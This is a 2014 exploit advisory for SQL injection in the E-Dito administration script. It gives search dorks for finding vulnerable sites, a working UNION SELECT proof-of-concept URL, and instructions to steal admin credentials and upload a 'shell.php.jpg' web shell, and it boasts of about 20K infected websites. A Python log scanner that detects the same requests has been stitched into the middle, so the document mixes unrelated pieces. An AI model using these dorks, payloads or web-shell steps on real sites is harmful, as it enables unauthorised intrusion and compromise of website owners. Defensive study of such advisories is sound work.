
E-Dito Administration Script Sql Injection

Author: R3Z0UK4 , Published: 20-05-2014
                      E-Dito administration script SQL Injection

===================================================================



####################################################################

#.:. Exploit Title : E-Dito Administration Script Sql Injection #

# .:. Author : R3Z0UK4 #

#.:. Contact : [fikorezouka(at)gmail(dot)com] #

#.:. Dork : inurl:fiche.php?id= #

#.:. Dork 2 : inurl:admin/fiche.php?id= #

#.:. Tested on : win&linux #

#.:. Vendor's Website : http://www.e-dito.net/ #

#.:. Date : [2014/5/19] #
####################################################################

VULNERABILITY

##############



[~] www.site.com/fiche.php?id=[SQL INJECTION]
[~] www.site.com/admin/fiche.php?id=[SQL INJECTION]

#########

P0C

#########

Type: String Mysql Injection



http://SITE/fiche.php?id=[SQL INJECTION]



http://site/fiche.php?id=175+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,version%28%29,32%20--
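A defender-side check for the request shape shown in the PoC above, added here as an example and not part of the original advisory: it scans constructed Apache access-log lines for requests to fiche.php whose `id` parameter is not a plain integer, and reports which SQL keywords the decoded value carries. The log lines, the function names `check_fiche_request` and `scan_log`, and the IP addresses are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache combined-log lines (not real traffic); the second
# one carries the UNION SELECT payload from the PoC, the third a quote probe.
SAMPLE_LOG = """\
203.0.113.5 - - [19/May/2014:10:01:02 +0000] "GET /fiche.php?id=175 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [19/May/2014:10:01:09 +0000] "GET /fiche.php?id=175+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,version%28%29,32%20-- HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
198.51.100.7 - - [19/May/2014:10:02:15 +0000] "GET /admin/fiche.php?id=12' HTTP/1.1" 500 331 "-" "curl/7.30"
198.51.100.8 - - [19/May/2014:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Common/combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Keywords that have no business inside a numeric record id.
SQL_TOKENS = re.compile(r"\b(union|select|from|where|version|sleep|benchmark)\b", re.I)


def check_fiche_request(target):
    """Return None for a benign request, else (decoded_id, sql_tokens).

    Only fiche.php (at any path depth, so /admin/fiche.php too) is inspected.
    parse_qs decodes '+' and %xx the same way PHP's $_GET would, so the
    check sees the value the application actually received.
    """
    parts = urlsplit(target)
    if not parts.path.endswith("/fiche.php"):
        return None
    ids = parse_qs(parts.query, keep_blank_values=True).get("id")
    if not ids:
        return None
    raw = ids[0]
    if raw.isdigit():
        return None  # a plain integer is the only value fiche.php should accept
    tokens = sorted({t.lower() for t in SQL_TOKENS.findall(raw)})
    return raw, tokens


def scan_log(text):
    """Return (ip, status, decoded_id, sql_tokens) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        verdict = check_fiche_request(m.group("target"))
        if verdict is not None:
            hits.append((m.group("ip"), int(m.group("status")), verdict[0], verdict[1]))
    return hits
```

The same integer-only rule applied inside fiche.php before the value reaches the query (cast to int, or bind it as an integer parameter) is the fix; the log check only tells you who has already tried.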

####################################################################
Get admin info (this should be easy x0)
then log in and upload your shell.php.jpg
Tamper or Live HTTP Headers should solve this S#17 :D
Enjoy
About #20K Infected Websites :v

You Can Find The Admin Panel @ http://site/admin/admin.php
or http://site/user/
or http://site/login/
#########################################################################
GreetZ Goes To: Vatou-Ge Ek-Microsoft-Dz-CapiLo-DzMindInjector...and many more
#########################################################################
